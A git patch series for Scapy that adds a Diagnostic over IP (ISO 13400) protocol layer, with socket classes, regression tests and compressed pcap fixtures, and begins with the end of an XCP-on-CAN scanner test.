new_can_socket0() +sock1.basecls = XCPOnCAN + +sock2 = new_can_socket0() +sock2.basecls = XCPOnCAN + + +def ecu(): + for i in range(50, 53): + sock1.sniff(count=1, store=False, timeout=2) + if i == 50: + sock1.send(CAN(identifier=0x90, data=b'\x01\x02\x03')) + sock1.send(CAN(identifier=0x90, data=b'\x05\x02\x03')) + sock1.send(CAN(identifier=0x90, data=b'\xff\x05\x03')) + if i == 51: + sock1.send(random_xcp_response_1) + sock1.send(random_xcp_response_2) + if i == 52: + sock1.send(slave_1_response) + sock1.send(slave_2_response) + + +thread = threading.Thread(target=ecu) +thread.start() + +scanner = XCPOnCANScanner(sock2, id_range=id_range, sniff_time=0.5) +result = scanner.scan_with_get_slave_id() +thread.join() +sock1.close() +sock2.close() +assert len(result) == 2 +assert result[0].request_id == slave_id_1 +assert result[0].response_id == response_id_1 +assert result[1].request_id == slave_id_2 +assert result[1].response_id == response_id_2 + + += xcp can scanner connect ID-range +id_range = range(50, 53) +slave_id = 52 +response_id = 11 + +connect_response = XCPOnCAN(identifier=response_id) / CTOResponse(packet_code=0xFF) / ConnectPositiveResponse() + +random_xcp_response_1 = XCPOnCAN(identifier=30) / CTOResponse(packet_code=0xFF) / GenericResponse(b"\x00\x00") +random_xcp_response_2 = XCPOnCAN(identifier=40) / CTOResponse(packet_code=0xFF) / GenericResponse(b"\x10") + +sock1 = new_can_socket0() +sock1.basecls = XCPOnCAN + +sock2 = new_can_socket0() +sock2.basecls = XCPOnCAN + + +def ecu(): + for i in range(50, 53): + sock1.sniff(count=1, store=False, timeout=2) + if i == 50: + sock1.send(CAN(identifier=0x90, data=b'\x01\x02\x03')) + sock1.send(CAN(identifier=0x90, data=b'\xff\x05\x03')) + if i == 51: + sock1.send(CAN(identifier=0x90, data=b'\x05\x02\x03')) + sock1.send(random_xcp_response_1) + sock1.send(random_xcp_response_2) + if i == slave_id: + sock1.send(CAN(identifier=0x90, data=b'\xff\x05\x03')) + sock1.send(connect_response) + + +thread = threading.Thread(target=ecu) +thread.start() + +scanner = XCPOnCANScanner(sock2, id_range=id_range, sniff_time=0.5) +result = scanner.scan_with_connect() +thread.join() +sock1.close() +sock2.close() + +assert len(result) == 1 +assert result[0].request_id == slave_id +assert result[0].response_id == response_id + + ++ Cleanup += Delete vcan interfaces +~ vcan_socket needs_root linux + +if 0 != call(["sudo", "ip", "link", "delete", iface0]): + raise Exception("%s could not be deleted" % iface0) From 1ffa744dfd2f91e555b81c99a506e859391f2708 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sun, 20 Dec 2020 04:08:06 +0100 Subject: [PATCH 0449/1632] Implementation of DoIP (ISO 13400) for Scapy [ready for merge] (#2979) * Implementation of DoIP (ISO 13400) for Scapy * typing * remove casts * minor addition * minor fixes * fix padding in DoIP * fix minor issue in UDS_TesterpresentSender * fix mypy * Rebase and fix of comments * Change pkt[1] to pkt.payload * Fixed binding * fixflake * zip pcaps --- .config/mypy/mypy_enabled.txt | 1 + scapy/contrib/automotive/bmw/hsfz.py | 4 +- scapy/contrib/automotive/doip.py | 243 +++++++++++++++++++ scapy/contrib/automotive/uds.py | 8 + test/contrib/automotive/bmw/hsfz.uts | 8 + test/contrib/automotive/doip.uts | 273 ++++++++++++++++++++++ test/contrib/automotive/ecu.uts | 4 +- test/contrib/automotive/ecu_trace.pcap | Bin 9132 -> 0 bytes test/contrib/automotive/ecu_trace.pcap.gz | Bin 0 -> 1813 bytes test/pcaps/doip.pcap.gz | Bin 0 -> 2984 bytes 10 files changed, 538 insertions(+), 3 deletions(-) create mode 100644 scapy/contrib/automotive/doip.py create mode 100644 test/contrib/automotive/doip.uts delete mode 100644 test/contrib/automotive/ecu_trace.pcap create mode 100644 test/contrib/automotive/ecu_trace.pcap.gz create mode 100644 test/pcaps/doip.pcap.gz diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index f322d7ada9f..003412e8844 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -35,3 +35,4 @@ scapy/layers/l2.py scapy/contrib/roce.py scapy/contrib/automotive/gm/gmlanutils.py scapy/contrib/automotive/bmw/hsfz.py +scapy/contrib/automotive/doip.py diff --git a/scapy/contrib/automotive/bmw/hsfz.py b/scapy/contrib/automotive/bmw/hsfz.py index dc985172e61..5ae30b7aa0b 100644 --- a/scapy/contrib/automotive/bmw/hsfz.py +++ b/scapy/contrib/automotive/bmw/hsfz.py @@ -82,7 +82,9 @@ def __init__(self, ip='127.0.0.1', port=6801): # type: (str, int) -> None self.ip = ip self.port = port - s = socket.socket() + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) + s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.connect((self.ip, self.port)) StreamSocket.__init__(self, s, HSFZ) diff --git a/scapy/contrib/automotive/doip.py b/scapy/contrib/automotive/doip.py new file mode 100644 index 00000000000..bc423bed793 --- /dev/null +++ b/scapy/contrib/automotive/doip.py @@ -0,0 +1,243 @@ +#! /usr/bin/env python + +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Nils Weiss +# This program is published under a GPLv2 license + +# scapy.contrib.description = Diagnostic over IP (DoIP) / ISO 13400 +# scapy.contrib.status = loads + +import struct +import socket +import time + +from scapy.fields import ByteEnumField, ConditionalField, \ + XByteField, XShortField, XIntField, XShortEnumField, XByteEnumField, \ + IntField, StrFixedLenField +from scapy.packet import Packet, bind_layers, bind_bottom_up +from scapy.supersocket import StreamSocket +from scapy.layers.inet import TCP, UDP +from scapy.contrib.automotive.uds import UDS +from scapy.data import MTU +from scapy.compat import Union, Tuple, Optional + + +class DoIP(Packet): + payload_types = { + 0x0000: "Generic DoIP header NACK", + 0x0001: "Vehicle identification request", + 0x0002: "Vehicle identification request with EID", + 0x0003: "Vehicle identification request with VIN", + 0x0004: "Vehicle announcement message/vehicle identification response message", # noqa: E501 + 0x0005: "Routing activation request", + 0x0006: "Routing activation response", + 0x0007: "Alive check request", + 0x0008: "Alive check response", + 0x4001: "DoIP entity status request", + 0x4002: "DoIP entity status response", + 0x4003: "Diagnostic power mode information request", + 0x4004: "Diagnostic power mode information response", + 0x8001: "Diagnostic message", + 0x8002: "Diagnostic message ACK", + 0x8003: "Diagnostic message NACK"} + name = 'DoIP' + fields_desc = [ + XByteField("protocol_version", 0x02), + XByteField("inverse_version", 0xFD), + XShortEnumField("payload_type", 0, payload_types), + IntField("payload_length", None), + ConditionalField(ByteEnumField("nack", 0, { + 0: "Incorrect pattern format", 1: "Unknown payload type", + 2: "Message too large", 3: "Out of memory", + 4: "Invalid payload length" + }), lambda p: p.payload_type in [0x0]), + ConditionalField(StrFixedLenField("vin", b"", 17), + lambda p: p.payload_type in [3, 4]), + ConditionalField(XShortField("logical_address", 0), + lambda p: p.payload_type in [4]), + ConditionalField(StrFixedLenField("eid", b"", 6), + lambda p: p.payload_type in [2, 4]), + ConditionalField(StrFixedLenField("gid", b"", 6), + lambda p: p.payload_type in [4]), + ConditionalField(XByteEnumField("further_action", 0, { + 0x00: "No further action required", + 0x01: "Reserved by ISO 13400", 0x02: "Reserved by ISO 13400", + 0x03: "Reserved by ISO 13400", 0x04: "Reserved by ISO 13400", + 0x05: "Reserved by ISO 13400", 0x06: "Reserved by ISO 13400", + 0x07: "Reserved by ISO 13400", 0x08: "Reserved by ISO 13400", + 0x09: "Reserved by ISO 13400", 0x0a: "Reserved by ISO 13400", + 0x0b: "Reserved by ISO 13400", 0x0c: "Reserved by ISO 13400", + 0x0d: "Reserved by ISO 13400", 0x0e: "Reserved by ISO 13400", + 0x0f: "Reserved by ISO 13400", + 0x10: "Routing activation required to initiate central security", + }), lambda p: p.payload_type in [4]), + ConditionalField(XByteEnumField("vin_gid_status", 0, { + 0x00: "VIN and/or GID are synchronized", + 0x01: "Reserved by ISO 13400", 0x02: "Reserved by ISO 13400", + 0x03: "Reserved by ISO 13400", 0x04: "Reserved by ISO 13400", + 0x05: "Reserved by ISO 13400", 0x06: "Reserved by ISO 13400", + 0x07: "Reserved by ISO 13400", 0x08: "Reserved by ISO 13400", + 0x09: "Reserved by ISO 13400", 0x0a: "Reserved by ISO 13400", + 0x0b: "Reserved by ISO 13400", 0x0c: "Reserved by ISO 13400", + 0x0d: "Reserved by ISO 13400", 0x0e: "Reserved by ISO 13400", + 0x0f: "Reserved by ISO 13400", + 0x10: "Incomplete: VIN and GID are NOT synchronized" + }), lambda p: p.payload_type in [4]), + ConditionalField(XShortField("source_address", 0), + lambda p: p.payload_type in [5, 8, 0x8001, 0x8002, 0x8003]), # noqa: E501 + ConditionalField(XByteEnumField("activation_type", 0, { + 0: "Default", 1: "WWH-OBD", 0xe0: "Central security" + }), lambda p: p.payload_type in [5]), + ConditionalField(XShortField("logical_address_tester", 0), + lambda p: p.payload_type in [6]), + ConditionalField(XShortField("logical_address_doip_entity", 0), + lambda p: p.payload_type in [6]), + ConditionalField(XByteEnumField("routing_activation_response", 0, { + 0x00: "Routing activation denied due to unknown source address.", + 0x01: "Routing activation denied because all concurrently supported TCP_DATA sockets are registered and active.", # noqa: E501 + 0x02: "Routing activation denied because an SA different from the table connection entry was received on the already activated TCP_DATA socket.", # noqa: E501 + 0x03: "Routing activation denied because the SA is already registered and active on a different TCP_DATA socket.", # noqa: E501 + 0x04: "Routing activation denied due to missing authentication.", + 0x05: "Routing activation denied due to rejected confirmation.", + 0x06: "Routing activation denied due to unsupported routing activation type.", # noqa: E501 + 0x07: "Reserved by ISO 13400.", 0x08: "Reserved by ISO 13400.", + 0x09: "Reserved by ISO 13400.", 0x0a: "Reserved by ISO 13400.", + 0x0b: "Reserved by ISO 13400.", 0x0c: "Reserved by ISO 13400.", + 0x0d: "Reserved by ISO 13400.", 0x0e: "Reserved by ISO 13400.", + 0x0f: "Reserved by ISO 13400.", + 0x10: "Routing successfully activated.", + 0x11: "Routing will be activated; confirmation required." + }), lambda p: p.payload_type in [6]), + ConditionalField(XIntField("reserved_iso", 0), + lambda p: p.payload_type in [5, 6]), + ConditionalField(XIntField("reserved_oem", 0), + lambda p: p.payload_type in [5, 6]), + ConditionalField(XByteEnumField("diagnostic_power_mode", 0, { + 0: "not ready", 1: "ready", 2: "not supported" + }), lambda p: p.payload_type in [0x4004]), + ConditionalField(ByteEnumField("node_type", 0, { + 0: "DoIP gateway", 1: "DoIP node" + }), lambda p: p.payload_type in [0x4002]), + ConditionalField(XByteField("max_open_sockets", 0), + lambda p: p.payload_type in [0x4002]), + ConditionalField(XByteField("cur_open_sockets", 0), + lambda p: p.payload_type in [0x4002]), + ConditionalField(IntField("max_data_size", 0), + lambda p: p.payload_type in [0x4002]), + ConditionalField(XShortField("target_address", 0), + lambda p: p.payload_type in [0x8001, 0x8002, 0x8003]), # noqa: E501 + ConditionalField(XByteEnumField("ack_code", 0, {0: "ACK"}), + lambda p: p.payload_type in [0x8002]), + ConditionalField(ByteEnumField("nack_code", 0, { + 0x00: "Reserved by ISO 13400", 0x01: "Reserved by ISO 13400", + 0x02: "Invalid source address", 0x03: "Unknown target address", + 0x04: "Diagnostic message too large", 0x05: "Out of memory", + 0x06: "Target unreachable", 0x07: "Unknown network", + 0x08: "Transport protocol error" + }), lambda p: p.payload_type in [0x8003]), + ] + + def answers(self, other): + # type: (Packet) -> int + """DEV: true if self is an answer from other""" + if other.__class__ == self.__class__: + if self.payload_type == 0: + return 1 + + matches = [(4, 1), (4, 2), (4, 3), (6, 5), (8, 7), + (0x4002, 0x4001), (0x4004, 0x4003), + (0x8001, 0x8001), (0x8003, 0x8001)] + if (self.payload_type, other.payload_type) in matches: + if self.payload_type == 0x8001: + return self.payload.answers(other.payload) + return 1 + return 0 + + def hashret(self): + # type: () -> bytes + if self.payload_type in [0x8001, 0x8002, 0x8003]: + return bytes(self)[:2] + struct.pack( + "H", self.target_address ^ self.source_address) + return bytes(self)[:2] + + def post_build(self, pkt, pay): + # type: (bytes, bytes) -> bytes + """ + This will set the Field 'payload_length' to the correct value. + """ + if self.payload_length is None: + pkt = pkt[:4] + struct.pack("!I", len(pay) + len(pkt) - 8) + \ + pkt[8:] + return pkt + pay + + def extract_padding(self, s): + # type: (bytes) -> Tuple[bytes, Optional[bytes]] + if self.payload_type == 0x8001: + return s[:self.payload_length - 4], None + else: + return b"", None + + +class DoIPSocket(StreamSocket): + def __init__(self, ip='127.0.0.1', port=13400, activate_routing=True, + source_address=0xe80, target_address=0, + activation_type=0): + # type: (str, int, bool, int, int, int) -> None + self.ip = ip + self.port = port + self.source_address = source_address + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) + s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + s.connect((self.ip, self.port)) + StreamSocket.__init__(self, s, DoIP) + + if activate_routing: + resp = self.sr1( + DoIP(payload_type=0x5, activation_type=activation_type, + source_address=source_address), + verbose=False, timeout=1) + if resp and resp.payload_type == 0x6 and \ + resp.routing_activation_response == 0x10: + self.target_address = target_address or \ + resp.logical_address_doip_entity + print("Routing activation successful! " + "Target address set to: 0x%x" % self.target_address) + else: + print("Routing activation failed! Response: %s" % repr(resp)) + + +class UDS_DoIPSocket(DoIPSocket): + def send(self, x): + # type: (Union[Packet, bytes]) -> int + if isinstance(x, UDS): + pkt = DoIP(payload_type=0x8001, source_address=self.source_address, + target_address=self.target_address) / x + else: + pkt = x + + try: + x.sent_time = time.time() # type: ignore + except AttributeError: + pass + + return super(UDS_DoIPSocket, self).send(pkt) + + def recv(self, x=MTU): + # type: (int) -> Packet + pkt = super(UDS_DoIPSocket, self).recv(x) + if pkt.payload_type == 0x8001: + return pkt.payload + else: + return pkt + + +bind_bottom_up(UDP, DoIP, sport=13400) +bind_bottom_up(UDP, DoIP, dport=13400) +bind_layers(UDP, DoIP, sport=13400, dport=13400) + +bind_layers(TCP, DoIP, sport=13400) +bind_layers(TCP, DoIP, dport=13400) + +bind_layers(DoIP, UDS, payload_type=0x8001) diff --git a/scapy/contrib/automotive/uds.py b/scapy/contrib/automotive/uds.py index 013e6aa05c1..5d23928660a 100644 --- a/scapy/contrib/automotive/uds.py +++ b/scapy/contrib/automotive/uds.py @@ -7,6 +7,8 @@ # scapy.contrib.status = loads import struct +import time + from itertools import product from scapy.fields import ByteEnumField, StrField, ConditionalField, \ BitEnumField, BitField, XByteField, FieldListField, \ @@ -1442,6 +1444,12 @@ def __init__(self, sock, pkt=UDS() / UDS_TP(), interval=2): """ PeriodicSenderThread.__init__(self, sock, pkt, interval) + def run(self): + # type: () -> None + while not self._stopped.is_set(): + self._socket.sr1(self._pkt, timeout=0.3, verbose=False) + time.sleep(self._interval) + def UDS_SessionEnumerator(sock, session_range=range(0x100), reset_wait=1.5): """ Enumerates session ID's in given range diff --git a/test/contrib/automotive/bmw/hsfz.uts b/test/contrib/automotive/bmw/hsfz.uts index 6976aa32792..e889867b1dd 100644 --- a/test/contrib/automotive/bmw/hsfz.uts +++ b/test/contrib/automotive/bmw/hsfz.uts @@ -1,3 +1,11 @@ +% Regression tests for the HSFZ layer + +# More information at http://www.secdev.org/projects/UTscapy/ + + +############ +############ + + HSFZ Contrib tests = Load Contrib Layer diff --git a/test/contrib/automotive/doip.uts b/test/contrib/automotive/doip.uts new file mode 100644 index 00000000000..59b4f5d5004 --- /dev/null +++ b/test/contrib/automotive/doip.uts @@ -0,0 +1,273 @@ +% Regression tests for the DoIP layer + +# More information at http://www.secdev.org/projects/UTscapy/ + + +############ +############ + ++ Doip contrib tests + += Load Contrib Layer + +load_contrib("automotive.doip", globals_dict=globals()) +load_contrib("automotive.uds", globals_dict=globals()) + += Defaults test + +p = DoIP(payload_type=1) + +assert p.protocol_version == 0x02 +assert p.inverse_version == 0xfd +assert p.payload_length == None +assert p.payload_type == 1 + += Build test 0 + +p = DoIP(bytes(DoIP(payload_type=0))) + +assert p.protocol_version == 0x02 +assert p.inverse_version == 0xfd +assert p.payload_length == 1 +assert p.payload_type == 0 +assert p.nack == 0 + += Build test 1 + +p = DoIP(bytes(DoIP(payload_type=1))) + +assert p.protocol_version == 0x02 +assert p.inverse_version == 0xfd +assert p.payload_length == 0 +assert p.payload_type == 1 + += Build test 2 + +p = DoIP(bytes(DoIP(payload_type=2))) + +assert p.protocol_version == 0x02 +assert p.inverse_version == 0xfd +assert p.payload_length == 6 +assert p.payload_type == 2 +assert bytes(p.eid) == b"\x00" * 6 + += Build test 3 + +p = DoIP(bytes(DoIP(payload_type=3))) + +assert p.protocol_version == 0x02 +assert p.inverse_version == 0xfd +assert p.payload_length == 17 +assert p.payload_type == 3 +assert bytes(p.vin) == b"\x00" * 17 + += Build test 4 + +p = DoIP(bytes(DoIP(payload_type=4))) + +assert p.protocol_version == 0x02 +assert p.inverse_version == 0xfd +assert p.payload_length == 33 +assert p.payload_type == 4 +assert bytes(p.vin) == b"\x00" * 17 +assert p.logical_address == 0 +assert bytes(p.eid) == b"\x00" * 6 +assert bytes(p.gid) == b"\x00" * 6 +assert p.further_action == 0 +assert p.vin_gid_status == 0 + += Build test 5 + +p = DoIP(bytes(DoIP(payload_type=5))) + +assert p.protocol_version == 0x02 +assert p.inverse_version == 0xfd +assert p.payload_length == 11 +assert p.payload_type == 5 +assert p.source_address == 0 +assert p.activation_type == 0 +assert p.reserved_iso == 0 +assert p.reserved_oem == 0 + += Build test 6 + +p = DoIP(bytes(DoIP(payload_type=6))) + +assert p.protocol_version == 0x02 +assert p.inverse_version == 0xfd +assert p.payload_length == 13 +assert p.payload_type == 6 +assert p.logical_address_tester == 0 +assert p.logical_address_doip_entity == 0 +assert p.reserved_iso == 0 +assert p.reserved_oem == 0 + += Build test 7 + +p = DoIP(bytes(DoIP(payload_type=7))) + +assert p.protocol_version == 0x02 +assert p.inverse_version == 0xfd +assert p.payload_length == 0 +assert p.payload_type == 7 + += Build test 8 + +p = DoIP(bytes(DoIP(payload_type=8))) + +assert p.protocol_version == 0x02 +assert p.inverse_version == 0xfd +assert p.payload_length == 2 +assert p.payload_type == 8 +assert p.source_address == 0 + += Build test 4001 + +p = DoIP(bytes(DoIP(payload_type=0x4001))) + +assert p.protocol_version == 0x02 +assert p.inverse_version == 0xfd +assert p.payload_length == 0 +assert p.payload_type == 0x4001 + + += Build test 4002 + +p = DoIP(bytes(DoIP(payload_type=0x4002))) + +assert p.protocol_version == 0x02 +assert p.inverse_version == 0xfd +assert p.payload_length == 7 +assert p.payload_type == 0x4002 +assert p.node_type == 0 +assert p.max_open_sockets == 0 +assert p.cur_open_sockets == 0 +assert p.max_data_size == 0 + + += Build test 4003 + +p = DoIP(bytes(DoIP(payload_type=0x4003))) + +assert p.protocol_version == 0x02 +assert p.inverse_version == 0xfd +assert p.payload_length == 0 +assert p.payload_type == 0x4003 + + += Build test 4004 + +p = DoIP(bytes(DoIP(payload_type=0x4004))) + +assert p.protocol_version == 0x02 +assert p.inverse_version == 0xfd +assert p.payload_length == 1 +assert p.payload_type == 0x4004 +assert p.diagnostic_power_mode == 0 + += Build test 8001 + +p = DoIP(bytes(DoIP(payload_type=0x8001))) + +assert p.protocol_version == 0x02 +assert p.inverse_version == 0xfd +assert p.payload_length == 4 +assert p.payload_type == 0x8001 +assert p.source_address == 0 +assert p.target_address == 0 + += Build test 8002 + +p = DoIP(bytes(DoIP(payload_type=0x8002))) + +assert p.protocol_version == 0x02 +assert p.inverse_version == 0xfd +assert p.payload_length == 5 +assert p.payload_type == 0x8002 +assert p.source_address == 0 +assert p.target_address == 0 +assert p.ack_code == 0 + += Build test 8003 + +p = DoIP(bytes(DoIP(payload_type=0x8003))) + +assert p.protocol_version == 0x02 +assert p.inverse_version == 0xfd +assert p.payload_length == 5 +assert p.payload_type == 0x8003 +assert p.source_address == 0 +assert p.target_address == 0 +assert p.nack_code == 0 + ++ pcap based tests + += read pcap file + +pkts = rdpcap("test/pcaps/doip.pcap.gz") +ips = [p for p in pkts if p.proto == 6] + +assert len(ips) > 1 + += dissect test of routing activation pkts req + +req = ips[0] +p = req +assert p.protocol_version == 0x02 +assert p.inverse_version == 0xfd +assert p.payload_length == 11 +assert p.payload_type == 0x5 +assert p.source_address == 0xe80 +assert p.activation_type == 0 +assert p.reserved_iso == 0 +assert p.reserved_oem == 0 + += dissect test of routing activation pkts resp + +resp = ips[1] +p = resp +assert p.protocol_version == 0x02 +assert p.inverse_version == 0xfd +assert p.payload_length == 9 +assert p.payload_type == 0x6 +assert p.logical_address_tester == 0xe80 +assert p.logical_address_doip_entity == 0x4010 +assert p.routing_activation_response == 16 +assert p.reserved_iso == 0 + += answers test of routing activation pkts + +assert resp.answers(req) +assert resp.hashret() == req.hashret() + += dissect diagnostic message + +req = ips[-4] +resp = ips[-1] + +p = req +assert p.protocol_version == 0x02 +assert p.inverse_version == 0xfd +assert p.payload_length == 6 +assert p.payload_type == 0x8001 +assert p.source_address == 0xe80 +assert p.target_address == 0x4010 +assert bytes(p)[-2:] == bytes(UDS()/UDS_DSC(b"\x02")) +assert p.service == 0x10 +assert p.diagnosticSessionType == 2 + +p = resp +assert p.protocol_version == 0x02 +assert p.inverse_version == 0xfd +assert p.payload_length == 10 +assert p.payload_type == 0x8001 +assert p.target_address == 0xe80 +assert p.source_address == 0x4010 +assert bytes(p)[-6:] == bytes(UDS()/UDS_DSCPR(b"\x02\x002\x01\xf4")) +assert p.service == 0x50 +assert p.diagnosticSessionType == 2 + +assert req.hashret() == resp.hashret() +# exclude TCP layer from answers check +assert resp[3].answers(req[3]) +assert not req[3].answers(resp[3]) diff --git a/test/contrib/automotive/ecu.uts b/test/contrib/automotive/ecu.uts index 3dff084c3f9..a50acd6645a 100644 --- a/test/contrib/automotive/ecu.uts +++ b/test/contrib/automotive/ecu.uts @@ -120,7 +120,7 @@ assert unanswered_packets[0].diagnosticSessionType == 4 # no_docs * A ``PcapReader`` object is used as socket and an ``ISOTPSession`` parses ``CAN`` frames to ``ISOTP`` frames * which are then casted to ``UDS`` objects through the ``basecls`` parameter -with PcapReader("test/contrib/automotive/ecu_trace.pcap") as sock: +with PcapReader("test/contrib/automotive/ecu_trace.pcap.gz") as sock: udsmsgs = sniff(session=ISOTPSession, session_kwargs={"use_ext_addr":False, "basecls":UDS}, count=50, opened_socket=sock) assert len(udsmsgs) == 50 # no_docs @@ -156,7 +156,7 @@ assert len(ecu.log["TransferData"]) == 2 session = ECUSession() -with PcapReader("test/contrib/automotive/ecu_trace.pcap") as sock: +with PcapReader("test/contrib/automotive/ecu_trace.pcap.gz") as sock: udsmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "use_ext_addr":False, "basecls":UDS}, count=50, opened_socket=sock) assert len(udsmsgs) == 50 # no_docs diff --git a/test/contrib/automotive/ecu_trace.pcap b/test/contrib/automotive/ecu_trace.pcap deleted file mode 100644 index d7eaa7db1710528e492a7624b645aefa6af9ac11..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 9132 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 diff --git a/test/contrib/automotive/ecu_trace.pcap.gz b/test/contrib/automotive/ecu_trace.pcap.gz new file mode 100644 index 0000000000000000000000000000000000000000..261d649372c1e93428d9be69e9fe5094c1f5d2a1 GIT binary patch literal 1813 zcmV+w2kQ7AiwFpxD!E?(17%}%UvzR|V`VOIV_|RrrP&Ek6K50$@ZE%4zyuKkUfCp& zgg`<>6wq1^&{{`L#RELh$e|RlA_x&Lh@hpYRa&*Jx2T19fd`hsL2AVV!NH^23I#k6 zrM4ajRxQ$?fNke}d6~)1>|`f1zx?0#?e4d4Ha2#4Ho+7{jUOs=q4l3_9h({DO$CNW zC4{LL@+H%v7DdF*S1*c|^1bC=@&SCwn5YDP*k`e^`j0^alo8?HKFV;PFh42PzP0~e z`)@hw_qey;n7uu=(C@>kciYJ%b81XLeH~wa+`dyZ&7MdI>?{ggy)+nX%?H1e`gDxZx*NbIvtpQ{cHo#Q=Q`nVbs6r> z)3y4u345oZ4~Twwhi9)$*H9hq|9(au?pdWQisV1_c!bu^mZZ|8@%xQ^X43qHUTHSs z`ePA&&NZ@6?wUW2Mn^dR;~VJPn72@|h}Um|noaaw^^3X0`pf2$eOLZGF2$Bdf%&OR z@O%rg!}X()S}_0KQaqnE&p}6;ztfr(Mk!yrG<3ipC-M}39LxPD;$ z*0>iYei@xr7jho*7j1Aay7{=JkJl3wrFD=^ILJ5z>Lq3y>d-thceOyGIZjjeG z;9mA)XmIq{+eMJS)C2b(L5@d;H>r<9{-Go8Jsl79Vw^&*LZ0n}dwJn-fB%WED+dq4hoX+NK=xk z$G!N~mVlpb&Pav)BnI~qRm=pRQG0oiPZ!```tU~ZRKI3${oEnMy}OiKHh8;lCFBc4 zxR)ip%)3?pjSTXYuDJK`&yd_a-xpkeAG_h+^I~I2gzNRkknbkJy}UJ@yJ?=nAM*ZE z+$#jBZ*pp!&p>{TJMQ`Z>W}`auFZt}5*hB9pk3EXj##rHztscxf~E}?rQNf@`}dkB z?uD)1EB0?4HyiSea@>o~m2AiwF+>dcWFNBc>i-jIV*kXQ|0&yv=QB-#)2v4Zj)(k*yKpZ!+ftc5pX&+v z$-8kcRKN+ipj9*LAm1+^_e}F@^~Z&UCm=uSDDDO21Lwq^nCcDr zg_p^`bNw=p(=UG%yngMUYlY@pDCsteHV4;l)djNuSAH8s$nQ~&=f8dbVh+E58DYR1 zvwmCF;`t0^Mtpv4X~6Rhy?^nrwI+IFp1&m`vhO;7gJ>`B0ZPyhl99bJ{ex0vTK(I@ 